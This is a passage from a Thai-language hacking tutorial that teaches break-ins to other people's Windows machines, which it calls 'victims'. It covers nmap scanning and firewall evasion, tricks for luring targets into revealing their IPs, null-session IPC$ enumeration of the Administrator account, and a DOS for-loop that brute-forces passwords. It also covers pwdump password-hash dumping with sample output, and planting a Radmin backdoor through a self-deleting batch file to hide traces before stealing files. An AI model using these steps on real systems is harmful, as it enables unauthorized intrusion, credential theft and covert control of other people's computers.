จะ เห็นว่าคำสั่งนี้ คลอบคลุมกว่า 2 คำสั่งด้านบน ยิ่งถ้าคุณได้เพิ่ม Option –p แล้วใส่ port ที่ต้องการแสกนได้อีกด้วยครับ แต่บางที Option –sS อาจหลบ Firewall ไม่ได้

Option –T 4 เป็นอีก option ที่น่าสนใจเป็นอย่างมาก คุณลองใช้ option ลงไปร่วมกับ option อื่นได้ จะช่วยให้การแสกนนั้นรวดเร็วยิ่งขึ้นครับเช่น

nmap –sS –O –T 4 203.118.98.110

nmap –sP –PT80 –T 4 203.118.98.0/24

การแสกนตรวจประเภท Firewall

nmap –sW 203.118.98.110 และคำสั่ง nmap –sA 203.118.98.110

คำ สั่งบนนี้ เป็นการตรวจสอบ Firewall ว่าเป็นประเภทไหน ในเครื่องที่มี IP 203.118.98.110 ทั้ง 2 Option นี้อาจเป็นตัวที่ใช้เจาะเครื่องที่มี firewall ป้องกัน เพื่อที่จะดูว่า จริงๆแล้วเปิด port อะไรบ้าง เพราะเราจะสามารถรู้ ระบบปฏิบัติการในเครื่องที่เราแสกนได้ จาก port ที่ได้เปิด

ในแต่ละเครื่อง ใน Internet คุณไม่สามารถไปดูที่หน้าจอได้ จึงยากต่อการรู้ว่า เครื่องนั้นๆ ใช้วินโดว์หรือ unix หรือ Linux เพราะฉนั้น คุณต้องดู port จากเครื่องเป้าหมาย แต่โปรแกรมแสกนธรรมดา จะไม่สามารถแสกน port ได้จากเครื่องที่ได้ติดตั้ง Firewall (แต่จริงๆ ก็เปิด port อยู่) จึงต้องใช้โปรแกรม nmap แสกน เพราะสามารถหลบ Firewall ได้
Window Port Default ข้างล่างนี้เป็น port มาตรฐาน ที่ Win มักจะเปิด และเราจะรู้ได้ หรือเดาได้ว่าใช้อะไร

Win 98/me 139

Win 2000/xp 139 – 445

Win 2000 Server 53 – 88 - 139 – 445

ส่วน UNIX / LINUX คุณจะเห็นความแตกต่าง port ที่เปิดเองครับ จะไม่เหมือน Window แน่นอนครับ

nmap –I ....IP....

อีก option ที่คุณน่าลองดู ว่าจะเกิดอะไรครับผม

การเก็บรายละเอียด(Enumeration)

วิธีการมีอยู่หลายวิธีครับ ผมจะยกตัวอย่าง 3 ตัวอย่างนะครับ

วิธี1 วิธีนี้ เป็นการหา IP เครื่องเหยื่อโดยการหลอกล่อ (กรณีที่เหยื่อรู้มาก ไม่กล้ารับ/ส่งไฟล์เพราะจะทำให้รู้ IP ได้ เอ้อ..เซ็งเจง)คุณเลยต้องหาวิธีนี้โดย ไปเซตที่เมล์คุณเองก่อนครับ เพื่อให้เมล์คุณ นั้น แสดง IP จากเครื่องต่างๆที่ได้ส่งเมล์มาหาเมล์คุณโดย ให้คุณเข้าไปที่เมล์คุณก่อน จากนั้นหาปุ่ม Option ตามรูปด้านล่างนี้ครับ

แล้วจะเห็นเป็นแบบรูปข้างล่างนี้

แล้วก็มาเลือกหัวข้อตามรูปด้านล่าง

หลัง จากที่เซตแล้ว เมื่อคุณได้รับเมล์มาจะแสดงรายละเอียดต่างๆดังรูปด้านล่างที่กรอบสีน้ำเงิน ซึ่งจะบอกรายละเอียดต่างๆ จากเครื่อง server ที่เป็นตัวนำส่งเมล์มาและรวมทั้ง IP ที่ส่งมาให้คุณ (หรือเครื่องที่ส่งเมล์มา) โดยคุณสังเกตุหน้าบรรทัดที่มีคำว่า Recived : from ดูรูปด้านล่างประกอบ

วิธีนี้จะทำให้เผย IP ของเครื่องเหยื่อ โดยการที่คุณไปหลอกล่อเหยื่อให้ส่งเมล์มาหาคุณ

วิธี2 Chat จาก MSN โดยตอนที่คุณ กำลัง รับ /ส่งไฟล์อยู่นั้น(หลอกล่อนิดหน่อย) สามารถที่จะรู้ว่า IP เครื่องที่เรากำลัง รับ/ส่งไฟล์นั้น เป็น IP อะไร โดยดูได้จากโปรแกรม Essential Net Tools หรือที่หัวข้อ Netstat คือตอนก่อนที่จะ รับ/ส่ง ไฟล์นั้นให้เปิดหรือเรียก netstat ขึ้นมาก่อน จากนั้นสังเกตดู ว่าเมื่อเราเริ่ม ส่งไฟล์นั้น มี IP ไหนเพิ่มขึ้นมามั่ง หรือมาเกาะเครื่องของคุณ ซึ่งหาหรือเดาได้ไม่ยาก

วิธี3 ใช้เทคนิคการ Ping Sweep เพื่อใช้หาเครื่องเหยื่อในวงแลน ที่คุณกำลังใช้อยู่

การหาชื่อ USER Administrator ในเครื่องเป้าหมาย

การ ที่คุณจะทำขั้นตอนนี้ได้ คุณต้องทำการแสกนเครื่องเป้าหมายให้ได้เสียก่อน และเครื่องเป้าหมายนั้นๆ จะต้องเปิด port 139,445 กับ Admin จะต้อง login ใช้งานอยู่ด้วยนะครับ ไม่งั้นอด ซึ่งบางเครื่องนั้นอาจไม่ได้เปิด port ที่ผมได้กล่างมาข้างต้น หมายถึงว่า อาจมีการติดตั้ง Service Pack ที่อับเดทล่าสุดไว้แล้ว ซึ่งบางทีอาจเปิด port 139,445 เอาไว้แต่ก็มีการป้องกัน หรือมีโปรแกรม Firewall อยู่ เรื่องแบบนี้ถ้าถอดใจ ก็นั่งดูรูปโป้ก็แล้วกันครับ คิกๆ เอ้า..สรุปให้อีกทีก็ได้ (กฎเหล็กของการล้วงตับมี 3 ประการ)

- เครื่องเหยื่อจะต้องเปิด port 139,445 หรือแชร์ $IPC ถ้ายัง งง ไปอ่าเรื่องการแสกน คลิกที่นี่

- Admin จะต้อง login ใช้งานอยู่ด้วย

- และคุณก็ต้อง login เป็น Admin ด้วยน๊า

เรื่อง อุปสรรค์นั้นสำหรับ Hacker นั้นเป็นสิ่งที่จะต้องเจอ มันไม่สวยหรูง่ายดายเหมือนหนังที่เค้าแสดง ซึ่งถ้าอยากเป็น Hacker จะต้องลองทำดู ถ้ามันมี เปอร์เซ็นต์อยู่ก็ต้องลองทำ แต่ผมขอบอกก่อนว่า ถึงแม้จะมี SP and Firewall ที่ดีก็ตามก็ใช่ว่าจะเจาะไม่ได้นะ ขอบอก คิกๆ เพราะว่ามีอีกหลายๆวิธี ซึ่งถ้าคุณรู้วิธีการยิ่งมาก และการหัดใช้โปรแกรมต่างรวมถึงการทดลองจริงๆ ซึ่งแต่ละบุคคลจะมีวิธีการที่ถนัดแตกต่างกันอยู่แล้ว มาเริ่มกันเลย

ให้ คุณไปหาโปรแกรม CAIN หรือโปรแกรม USER2SID.EXE กับ SID2USER.EXE มาใส่ไว้ในเครื่องก่อนครับ หรืออาจเป็นโปรแกรม ENUM.EXE ในที่นี้ผมจะไม่อธิบายโปรแกรม CAIN นะครับ แต่โปรแกรม CAIN นั้นทำงานแบบ auto ซึ่งไม่จำเป็นต้องใช้ความรู้อะไรมากมาย เพียงแต่เปิดโปรแกรมขึ้นมากดไม่กี่ปุ่ม ก็ได้ชื่อ Admin มาแล้ววว

เมื่อ คุณได้โปรแกรม USER2SID.EXE กับ SID2USER.EXE หรือ ENUM.EXE มาแล้วให้แตกไปไว้ที่โฟล์เดอร์ใดๆ (ขอบอกว่า สร้างโฟล์เดอร์ที่แบบเข้าง่ายๆ พิมพ์ง่ายๆ ไม่ต้องซับซ้อน) หรือจะเอามาไว้ที่ ไดร์ฟ ซี C:\> เฉยๆก็ได้ครับ ในกรณีผมผมใส่ไปที่ C:\Hack> จ้า

จากรูป ด้านบน ผมเข้าไปที่โฟลเดอร์ HACK และก่อนที่จะใช้โปรแกรม user2sid และ sid2user คุณจะต้องสร้าง connection ไปที่เครื่อง 203.209.120.190 แบบ anonymous หรือ null session โดยการพิมพ์ net use \\203.209.120.190\IPC$ ""u"" แล้วกด Enter

*** ( วิธีการยกเลิกการเชื่อมต่อ พิมพ์ในดอสว่า net use * /d /y ) ***

เป็นการเชื่อมต่อไปยังเครื่องเหยื่อ IP = 203.209.120.190 ที่ port 139 หรือ IPC$ นั่นเอง

โดยจะมีข้อความว่า The command completed successfully. ดังรูปบนนี้

จากนั้นให้พิมพ์ตามรูปด้านล่างนี้ ผมพิมพ์ว่า user2sid \\203.209.120.190 kmitnb-vvnn4ti8 แล้ว Enter

ซึ่ง kmitnb-vvnn4ti8 นั้นคือชื่อเครื่องของ 203.209.120.190 หรือเรียกอีกอย่างว่า “Domain User”

ให้ดูตรง S-1-5-21-448539723-261903793-1801674531 ตรงนี้สำคัญมาก เป็นเลขรหัสที่สำหรับใช้ดู user ของ Admin จากเครื่องเหยื่อครับ

จากนั้นเราจะใช้งานโปรแกรม SID2USER.EXE ในการดู User Admin เครื่องเหยื่อโดยการพิมพ์ตามข้างล่างนี้

เวลา ใช้เราต้องเอาค่าต่างๆตรง S-1-5-21-448539723-261903793-1801674531 มาใช้ด้วยครับ แต่ต้องแปลงนิดนึงโดย ตัวที่เป็นเครื่องหมายลบ ให้เอาออก และทำเป็นช่องว่างแทน จากนั้นตัว S-1 ก็ไม่ต้องนำมาใช้

ตัวอย่าง

จากที่คุณใช้ user2sid.exe คุณจะได้ค่านี้มา S-1-5-21-448539723-261903793-1801674531

เวลาใช้คำสั่ง sid2user.exe ให้คุณเพิ่มเลข 5 ที่ตัวท้ายสุดแล้วเว้นวรรค 1 ครั้งใส่ 500 ลงไปท้ายสุด ผลที่ได้

จะเป็น sid2user \\203.209.120.190 5 21 448539723 261903793 1801674531

โปรแกรมก็จะบอกชื่อ Admin มาโดยดี

การเข้าถึงระบบ(Gaining Access)

BF (Brute Force)

ใน ที่นี้ผมจะกล่าวถึงว่า การที่จะเจาะไปในเครื่องอื่นๆนั้นเราจะต้องมีการเตรียมตัวอย่างไร เช่น เครื่องมือต่างๆ และก็ ข้อมูลต่างๆที่ได้มาจากบทความก่อนหน้านี้ เพราะถ้า สิ่งแวดล้อมต่างๆไม่เอื้ออำนวยแช่นเรื่องการเปิด share ในไดร์ฟต่างๆหรือ port 139,445 ต่างๆ (ก็คือการป้องกันที่ดี) จะทำให้การเจาะนั้นยากยิ่งขึ้น และ user Admin ก็ต้องมีการตั้ง password ที่ซับซ้อน ในหัวเรื่องนี้ผมจะเน้นวิธีการดึงเอา password ของ Admin ในเครื่องเหยื่อ

เท้า ความ : ระบบรักษาความปลอดภัยตั้งแต่สมัยโบราณกาล นิยมจะใช้ระบบ  รหัสผ่าน (password นั่นแหละ) ทีนี้ ปัญหาของเรื่องนี้ คือ  เราจะเข้าไปได้ยังไง โดยผ่านการรักษาความปลอดภัยด้วยรหัสผ่าน... เอ้า  ทายสิ..... ว่าทำยังไง
เฉลยละนะ.. น่าจะเดาถูกกันทุกคน... ถ้าเราไม่รู้ เราก็ต้องเดานั่นเอง

การ brute คือการเดารหัสผ่าน ดีๆ นี่เอง... และโดยพื้นฐานแล้ว ระบบ  password มูลฐาน จะอยู่ในรูป alphanumeric 3-8 หลัก (คือ ตัวเลข  และตัวอักษร ตัวเล็ก + ตัวใหญ่ ภาษาอังกฤษ อย่างน้อยสุด 3 หลัก อย่างมากสุด  8 หลัก) ทีนี้... ถ้าเราจะเดา password ของ อะไรสักอย่าง โดยเราไม่รู้เลย  ต้องเดามั่วจริงๆ จะทำยังไงดี?

แน่นอน... วิธีที่ง่ายที่สุดก็ วน loop ไล่ไปตั้งแต่ 000 จนถึง ZZZZZZZZ นั่นเอง

ok.. เราก็รู้แล้ว ว่า brute มันคืออะไร ทำยังไง.. ทีนี้  มาลองสมมติเป็นสถานการณ์ดู.. ถ้าคุณ จะเข้าระบบรักษาความปลอดภัย  พยายามมากเลย มั่ว pass ไล่ไปตั้งแต่ 000 ไล่ขึ้นไปเรื่อยๆ ถ้าเป็นยังงั้น  โอกาสที่จะผ่านเข้าไปได้คงน้อย เพราะว่า ตัวยามรักษาความปลอดภัยหนะ  คงไม่ยอมให้คุณมา มั่วๆ จนผ่านเข้าไปได้หรอก (เหมือนกับระบบ login ซึ่งปกติ  ส่วนใหญ่ จะมีการ log ไว้ว่า มีใครพยายามจะต่อเข้ามาจาก ip ไหน  และถ้าพยายามต่อเข้ามามากๆ ครั้ง ในเวลาสั้นๆ ก็จะปิดการตอบรับจาก ip  นั้นชั่วคราว(เพราะ 1. เพื่อกันคน brute 2. เพราะมันเป็นการโจมตีระบบด้วย  DoS , สถานการณ์เดียวกับ pingflood, อ่านเพิ่มเติมจากเรื่อง ping))

ข้อหลักๆในการ HACK

- *- ใช้ระบบใดอยู่ Window อะไร หรือ Linux , Unix เพื่อที่คุณจะได้หาเครื่องมือ (โปรแกรม) ที่เหมาะสมกับระบบ เพราะถ้าเครื่องมือมันต่างระบบกัน มานก็ใช้มะได้นะ

- *- Port ที่เปิดใช้ ก็สามารถบอกได้เหมือนกันว่าเป็นระบบไหน แต่บางเครื่องที่ผู้ดูแลฉลาด มักจะเปิด port หลอกๆ ก็มี หรือบางทีคุณอาจเจอเครื่องเป้าหมายนั้นได้เปิด port โทรจันหรือโปรแกรม remote (ถ้าคุณรู้ว่า port ที่เปิดนั้น ใช้โปรแกรมไหน) คุณอาจใช้โปรแกรมนั้น เชื่อมต่อได้เลย

- *- ชื่อผู้ใช้ในเครื่อง เราจะต้องสนแต่ชื่อ Admin เท่านั้นและเครื่องเหยื่อนั้น ก็ต้อง login เป็น admin อยู่ด้วย เวลา hack เข้าไปเพราะถ้าเป็นชื่อ user แบบอื่นๆ เข้าไปได้ ก็ไม่มีสิทธิ์อะไรในการจัดการเครื่องอยู่ดีครับ และ เวลาจะ hack คุณก็ต้องล็อกอินในเครื่องคุณด้วย user admin ด้วยครับ

- *- ไฟล์ password ที่คุณทำขึ้นเอง หรือหาเอาจากในแผ่น ของผมก็ได้ และผมได้ให้โปรแกรมสร้างไฟล์ password มาพร้อมกับแผ่นด้วย ไฟล์ password นั้นสำคัญมากที่สุดในการ hack คุณต้องใส่ใจเรื่องนี้พอสมควรเพราะมันจะเป็นกุญแจที่จะเข้าไปในเครื่องเป้า หมาย



สรุปแล้วก็คือ ไม่ค่อยได้ผลในการนำไปใช้จริง นั่นเอง (แต่ใช้ได้ สำหรับบางที่ บางระบบ)

ทีนี้ ถ้า brute ไม่ได้ เราจะทำยังไงหละ? แล้วพวก hacker ที่เค้าเจาะระบบ แล้วบอก admin หนะ เค้าทำยังไงกัน?.....

Password Dump

PwDump เป็นอีกโปรแกรมหนึ่งซึ่งแสบไม่ใช่เล่นๆ คิกๆ โปรแกรมนี้ใช้สำหรับดัมพ์เอารหัสผ่านจาก Registry ของเครื่องเหยื่อออกมาเป็นไฟล์ text แล้วจากนั้นก็เอามา crack password ด้วยโปรแกรม LC4 , LC5 , John The Ripper , Cracker Jack ตามถนัด ซึ่งตอนนี้ pwdump เท่าที่ทราบมี 3 เวอร์ชั่น และเวอร์ชั่นแรก เจ้งกระบ้งไปแร้ว เหอๆ เพราะใช้อะไรไม่ค่อยได้ มาเริ่มละเลงกันดีกว่า พร่ามไปเยอะไม่ดี

pwdump2 (หากันเอาเองนะ ตามร้านกูเกิ้ล)

เวอร์ชั่น นี้ จำเป็นมากๆที่ต้องส่งไปรันที่เครื่องเหยื่อ คือ ต้องไปนั่งอยู่หน้าเครื่องเหยื่อได้ หรือ remote,ขโมยหน้าต่างดอส ที่เครื่องเหยื่อมาสำเร็จก่อนและคุณต้องแน่ใจว่าคุณได้ส่งไฟล์นี้ไปที่ เครื่องเหยื่อเรียบร้อยแล้ว วิธีการใช้งานก็พิมพ์ที่ดอสครับ อย่างแรกเลยให้ copy ไฟล์ pwdump2.exe และ samdump.dll ไปเก็บที่เครื่องเหยื่อให้ได้เสียก่อน จากตัวอย่างผมได้ copy 2 ไฟล์นี้ไว้ที่ C:\> เฉยๆนะ

กรณีนี้คือ เมื่อเปิดดอสมาแล้วจากรูปด้านล่าง(หรือได้ขโมยหน้าต่างดอสจากเครื่องเหยื่อ ได้มาแล้ว) มันดันไปอยู่ที่โฟล์เดอร์อื่นๆ ให้คุณพิมพ์ cd\ มันจะย้ายมาที่ C:\> ทันทีแล้วเรียกโปรแกรม แต่ถ้าเปิดมาแล้วอยู่ที่ C:\> คุณก็พิมพ์ pwdump2 ได้เลย

C:\Hack>

C:\Hack>cd\

C:\>

C:\>pwdump2

จากนั้นโปรแกรมก็จะ ทำการ dump password เครื่องนั้น และผลลัพธ์ ก็จะเห็นประมาณนี้
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>pwdump2
Administrator:500:1c6de50fc9b54e412f46dea65daa01b4b0:9ca21572a7544491fe0cae2fcdcc4
2a4:::
Guest:501:aad3b8435b51404eeaafd3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sophia:1003:aafd3b435b51404efeaad3b435b51404ee:31d6cfe0d16a4e931b73c59d7e0c089c0:::

__vmware_user__:1001:aadf3b435b51404eefaad3b435b51404ee:64c0f1869d05f2df7fbaa64af1
526af4:::

C:\>

ตรงผลลัพธ์ที่ได้คือ

Administrator:500:1c6de50fc9b54e412f46dea65daa01b4b0:9ca21572a7544491fe0cae2fcdcc4
2a4:::
Guest:501:aad3b8435b51404eeaafd3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sophia:1003:aafd3b435b51404efeaad3b435b51404ee:31d6cfe0d16a4e931b73c59d7e0c089c0:::

__vmware_user__:1001:aadf3b435b51404eefaad3b435b51404ee:64c0f1869d05f2df7fbaa64af1
526af4:::

ให้ คุณเซฟเป็นไฟล์ .txt หรือไฟล์ text นั่นเอง จากนั้นก็เอามา crack password ด้วยโปรแกรม LC4,LC5,John The Ripper,Cracker Jack ตามถนัด คิกๆ

pwdump3 หรือ pwdump3e

และ ก่อนที่จะใช้โปรแกรม PwDump3 คุณจะต้องสร้าง connection ไปที่เครื่อง 203.209.120.190 แบบ anonymous หรือ null session โดยการพิมพ์ net use \\203.209.120.190\IPC$ ""u"" แล้วกด Enter

การที่จะทำวิธีนี้ได้ เครื่องเหยื่อต้องเปิด port 139,445 ก่อนหรือเปิด share $IPC นั่นเองครับ

ส่วน เวอร์ชั่นนี้ คุณสามารถที่จะรันโปรแกรมจากระยะไกลไ้ครับ แต่ข่าวร้ายของ hacker คิกๆ คุณต้องจำเป็นต้องมีสิทธิ์เทียบเท่า Admin ในเครื่องเหยื่อ ว้าแย่จัง ตรงนี้ถ้าว่าวกันซื่อๆ คือ remote,ขโมยหน้าต่างดอส ที่เครื่องเหยื่อมาสำเร็จก่อน เหอๆ ไม่งั้นแห้วครับท่าน ส่วนการใช้โปรแกรม เหมือนเดิม copy ไปไว้ที่ไหนก็ได้ในเครื่องคุณ หรือไปไว้ที่ C:\> แล้วทำแบบนี้
C:\>pwdump3 192.0.0.1แล้วกดEnter

ตรง 192.0.0.1 ต้องเป็น IP ของเครื่องหยื่อน๊า ไม่ใช่ของเครื่องคุณเอง แล้วผลลัพธ์ก็จะเหมือนโปรแกรม pwdump2 และก็ทำเหมือนๆกัน

การ HACK แบบใช้ดอส

ก่อน จะใช้คำสั่งนี้ คุณต้องรู้ชื่อ Admin จากเครื่องเหยื่อให้ไ้ก่อนจากโปรแกรม Pwdump ไม่งั้น คุณอาจยิง password กันทั้งชาติ คิกๆ หลังจากนั้นให้คุณสร้างโฟล์เดอร์ ซึ่งจากตัวอย่าง ผมได้สร้าง Folder ชื่อ Hack ที่ dirve C: และใน Folder ชื่อ Hack ให้คุณเก็บไฟล์ password ต่างๆเอาไว้หรืออาจเป็นไฟล์อื่นๆ ที่ใช้ในการ hacking ด้วยก็ได้ ควรที่จะทำเป็น Folder ที่พิมพ์ง่ายๆ และเร็ว เพื่อที่จะเรียกใช้งานได้สะดวก

จากนั้นคุณก็หาไฟล์ password หรือจะสร้างขึ้นเองก็ได้จากโปรแกรมที่ผมได้ให้ไป เอามาใส่ไว้ที่ C:\Hack> หรือที่ Folder Hack (คุณอาจสร้างขึ้นมาเป็นชื่ออื่นก็ได้) เพราะเวลาใช้คุณจะต้องมีการอ้างที่อยู่ไฟล์ที่ถูกต้องนั่นเอง และยิ่งคุณมีไฟล์ password ที่หลากหลายเท่าไหร่ ความสำเร็จก็มีมากขึ้นครับ แต่ถ้าเครื่องคุณอาจยังคงมีการเชื่อมต่อแบบ anonymous หรือ null session ให้คุณยกเลิกคำสั่งการเชื่อมต่อไปก่อนด้วยคำสั่งด้านล่างนี้ แล้วค่อยลงมือ Brute Force ในแบบฉบับดอส

*** ( วิธีการยกเลิกการเชื่อมต่อ พิมพ์ในดอสว่า net use * /d /y ) ***
C:\Hack>for /F “tokens=1*” %i in ( pass.txt ) do net use \\ 203.114.234.5 \ IPC$ % i /u: Admin

จาก คำสั่งด้านบนนี้ เป็นการใช้คำสั่ง for เป็นตัววนลูบร่วมกับ net use เพื่อที่จะหา password ในเครื่อง 203.114.234.5 ถ้า อธิบายอย่างละเอียดคือ คำสั่งข้างต้นนี้ จะส่งไฟล์ pass.txt โดยแยกเอา string ในแต่ละบรรทัดในไฟล์ pass.txt ซึ่งเป็นคำต่างๆ(รหัสผ่านจากรูปด้านล่าง) จากนั้นก็ได้แทนค่าลงไปที่ %i จากนั้นคำสั่ง net use จะพยายาม connect (เชื่อมต่อ) ไปที่ share ที่ชื่อ IPC$ในเครื่อง 203.114.234.5 คือ port 139 นั่นเอง แล้วจะส่งค่ารหัสผ่าน ชื่อผู้ใช้ Admin และรหัสผ่าน %i ที่อยู่ในไฟล์ pass.txt

pass.txt เป็นไฟล์ password ที่สำหรับเก็บคำต่างๆ เอาไว้เพื่อเดา password ของ Admin ในเครื่องเป้าหมาย ซึ่งต้องมีอยู่ในที่ Folder Hack และที่อยู่ในและข้างในไฟล์ password จะเป็นแบบนี้ สมมติรูปด้านล่างนี้คือไฟล์ pass.txt

การ Hack แบบโปรแกรม

SMBgrid เป็นอีกหนึ่งโปรแกรมที่เป็นเครื่องมือแบบ Brute Force การใช้งานนั้น ไม่ยากอย่างที่คิด การใช้โปรแกรมแบบนี้จะง่ายต่อการใช้งานคือ คุณอาจไม่ต้องรู้ข้อมูลอะไรมากมายในเครื่องเหยื่อ แค่คุณได้ชื่อ Admin จากวิธีการด้านบนมากับมีไฟล์ password ที่เป็น text file ก็สามารถใช้โปรแกรมนี้ได้แล้ว หน้าตาโปรแกรมก็เชยๆ อยากให้ลองเอาไปเล่นกันดูครับ

Computer Name or IP: ให้คุณใส่ IP เครื่องเหยื่อได้เลย

User Name: ให้คุณใส่ชื่อ Admin ของเครื่องเหยื่อครับ

Connect เมื่อเลือกแล้ว เวลาโปรแกรมได้ยิง password แล้วถ้าถูกจังๆหรือเป็น password Admin เครื่องเหยื่อ คุณก็สามารถเข้าไปในเครื่องเหยื่อได้เลย

Change pwd ไม่เคยลองอ่า.. แล้วจะมาเขียนวิธีใช้ทำบ้าไรฟะ อืมๆ น่าจะรู้ความหมายเองนะ

ปุ่มView เอาไว้ดูไฟล์ pass ต่างๆว่ามีตัว pass อะไรมั่งจากไฟล์

ปุ่มBrowse เอาไว้หาไฟล์ password มายิงเครื่องเหยื่อ

Verbose จะทำให้เห็นสถานะต่างเวลาโปรแกรมทำงาน

Error แสดงผลว่าเวลาโปรแกรมทำงานผิดพลาดตรงไหน

Auto Scroll เวลาแสดงผลมันจะมีหลายบรรทัใช่มั้ย ก็ต้องใช้ตัวนี้แหละ

ปุ่มRun เมื่อตั้งค่าทุกอย่างดีแล้ว กดเลย

การสร้างประตูลับ(Back doors)

ผม เชื่อได้ว่า หัวข้อนี้ หลายๆคนคงชอบมาก เพราะจะเป็นการลงโปรแกรม Trojan Backdoor Remote ต่างๆไปที่เครื่องเหยื่อ เพื่อที่คุณจะได้มีโอกาสกลับมาขโมยข้อมูลใหม่ หรืออาจทำเพียงแค่แกล้งคนเล่นสนุกๆเท่านั้น เรามาลองดูกันว่าเค้ามีวิธีติดตั้งกันอย่างไรบ้าง ในตัวอย่างที่ผมจะแนะนำนั้น ผมขอยกตัวอย่างมา 1 โปรแกรมนะครับ Remote Admin 2.1 สำหรับผู้ที่ถนัดโปรแกรมอื่นผมก็ไม่ว่าอะไร เพราะคุณอาจใช้แนวทางที่ผมสอนมาประยุกต์ใช้ไปด้วยได้เลย

หลักสำคัญในการใช้โปรแกรม

ส่วน โปรแกรมอื่นๆที่เป็นโปรแกรม Backdoor and Trojan นั้นเวลาคุณจะเข้าไปควบคุมเครื่องเหยื่อ คุณจะต้องส่งไฟล์ ที่มีชื่อประมาณว่า "server หรือ srv" ประมาณนี้ครับ เพราะว่าจะเป็นตัวทำให้เครื่องเหยื่อ รอการ Connect จากเครื่อง Cliend เครื่องของคุณนั่นเอง และไฟล์ server ต่างๆคุณสามารถที่จะเปลี่ยนให้เป็นชื่ออื่นๆได้ วิธีที่เนียนที่สดคุณอาจเปลี่ยนชื่อไฟล์ server เหล่านี้ให้เป็นชื่อคล้ายๆไฟล์ระบบ เช่น NTSys Notepads เหอๆ ลองจินตนาการเอาเองนะ

Remote Admin 2.1

ที่ผมแนะนำโปรแกรมนี้เหตุผลคือ

-โปรแกรม นี้สามารถติดตั้งบนดอสได้ ลองคิดดูว่า ถ้าเป็นเครื่องอื่นๆใน Internet คุณไม่สามารถไปนั่งหน้าเครื่องได้ ลองคิดดูโปรแกรมส่วนใหญ่แล้วเวลาติดตั้งมักจะมีหน้าต่างให้คลิก Next ไปเรื่อยๆ(แล้วจะติดตั้งยังไงคิดดู) แต่โปรแกรมนี้เด็ด การไปติดตั้งเครื่องเหยื่อนั้น เนียนสุดๆ

-โปรแกรมนี้มี ขนาดไฟล์ที่เล็กกระทัดรัด สามารถใส่แผ่น 3 นิ้วได้อย่างสบาย และใช้เวลาติดตั้งเพียง 10 วินาที (อันนี้รวมการก็อบไฟล์ลงเครื่องด้วยนะ) และติดตั้งด้วยการ ดับเบิ้ลคลิกแค่ครั้งเดียว จ๊าบบบ..

ก่อน อื่นให้คุณติดตั้งโปรแกรมให้เสร็จก่อนนะครับ เพราะส่วนนี้มันไม่ยากเกินความสามารถของทุกคนอยู่แล้วผมเชื่อ และถ้าคิดว่ากลัวใช้ไม่เป็น ลองไปอ่านดูได้ที่นี่ครับ

http://www.xirbit.com/html/programs/radmin/index.shtml

จาก นั้นให้ไปที่โฟล์เดอร์ของโปรแกรมนะครับ แล้วคุณจะเห็นไฟล์อยู่ 2 ตัวที่จะเอาไปใช้ในเครื่องเหยื่อ คือ r_server.exe and AdmDll.dll ซึ่ง 2 ไฟล์นี้ต้องอยู่ด้วยกันในเครื่องเหยื่อนะครับ จะเอาไปใส่ที่ไหนก็ได้

ออกแรงกันหน่อยนะ ต่อไปต้องเขียน bat file ที่คุณต้องสร้างขึ้นเองโดนการเปิด Notepad ขึ้นมาเขียนตามนี้

r_server /install

r_server /pass: 123456 /save

ตรง ตัวเลข 123456 ที่เป็นสีแดง ให้คุณเปลี่ยนเป็นตัวอะไรก็ได้ มันจะเป็น password เอาไว้เข้าไปควบคุมเครื่องเป้าหมาย ต้องจำให้ได้นะครับ เพราะว่าก่อนคุณจะเข้าไปควบคุมเครื่องที่คุณได้ติดตั้งไฟล์ r_server คุณจะต้องใส่ password ที่คุณได้ตั้ง ซึ่งในตัวอย่างที่ผมได้ทำ password เป็น 123456 ถ้าดันลืมไม่งั้นต้องทำ batfile ส่งไปใหม่

จะ เห็นว่ารูปข้างบน นั้นผมได้ทำคำสั่ง del radmin.bat เพราะว่าหลังจากที่ผมเขียนคำสั่งด้านบนเสร็จแล้ว ผมจะเซฟเป็นชื่อ radmin.bat เพราะว่าหลังจากรันคำสั่งติดตั้งต่างๆแล้ว ให้ลบไฟล์ที่พิมพ์นี้ทิ้งไป เพื่อปกปิดร่องรอย ต้องระบุนามสกุลเป็น .bat อย่าลืมนะครับเวลา save จากนั้นคุณก็เอาไฟล์นี้ไปไว้กับ 2 ไฟล์ รูปด้านบนคือไฟล์ r_server.exe กับ AdmDll.dll และ radmin.bat ที่สร้างมาสดๆรวมเป็น 3 ไฟล์ เอาไว้ที่เครื่องเป้าหมาย โดยการส่งทางใดก็ได้ (ต้องเอาไว้ที่เดียวกัน) ตามวิธีที่ผมได้สอน hack จากเรื่องอื่น โดยต้องรันที่เครื่องเป้าหมายนะ โดยเรียกไฟล์ radmin.bat ที่เครื่องเป้าหมาย (ขโมย ดอสฝั่งเครื่องเหยื่อมาก่อน)ไม่ใช่เครื่องคุณเอง แล้วหลังจาก restart เครื่องเป้าหมาย คุณก็สามารถคุมได้เลย สังเกตบรรทัดสุดท้าย เป็นการลบไฟล์ radmin.bat นี้ทิ้งไปด้วย ป้องกันเผื่อเหยื่อเปิดอ่านดูไฟล์ (เวลาเรียกไฟล์ radmin.bat ขึ้นมาดูหรือแก้ไข ให้คลิกขวาที่ไฟล์นะครับ เลือก edit ) ถ้าดับเบิ้ลคลิกจะเป็นการเรียกโปรแกรม

จากนั้นก็รอเวลาให้เหยื่อ restart เครื่องแล้วมาต่อเน็ตใหม่ เพียงเท่านี้ คุณก็สามารถควบคุมเครื่องเหยื่อได้ตามต้องการ

การขโมยข้อมูล(Pilfering)

หัวข้อนี้ก็ไม่ได้มีอะไรสำคัญอีกเหมือนกัน เพียงแต่ ต้องหัดเป็นคนสังเกตุ และก็ งก นิดๆ เหอๆ "ทำไมผมพูดแบบนี้"

ถ้า คุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง

